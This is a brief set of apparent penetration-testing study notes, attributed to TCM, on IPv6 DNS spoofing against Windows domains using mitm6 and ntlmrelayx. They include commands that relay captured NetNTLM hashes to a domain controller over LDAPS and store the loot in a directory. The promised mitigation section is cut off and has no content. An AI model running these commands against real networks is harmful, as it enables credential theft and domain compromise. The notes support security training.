Typically, IPv6 is enabled on Windows machines but no IPv6 DNS server is set. Every 30 minutes Windows will check for DNS servers (you can speed this up with a reboot). When it sees that no DNS server is available, the OS sends a LLMNR request to link-local hosts. The attacker can set up a rogue IPv6 DNS server and capture the NetNTLM hash and LDAP relay the the hash to the domain controller (the user of the hash doesn’t even have to be admin).
The request may also be emitted when a user log in. In particular, when an administrator logs in, mitm6 will automatically add a special user with exclusive domain privileges.
IPv6 DNS spoofing can be done by using mitm6 in conjunction with NTLM relay.
mitm -d domain.local
# in a separate terminal
ntlmrelayx.py -6 -t ldaps://DC_IP -wh fakewpad.domain.local -l ./lootdirIPv6 DNS spoofing can be mitigated:
(from TCM)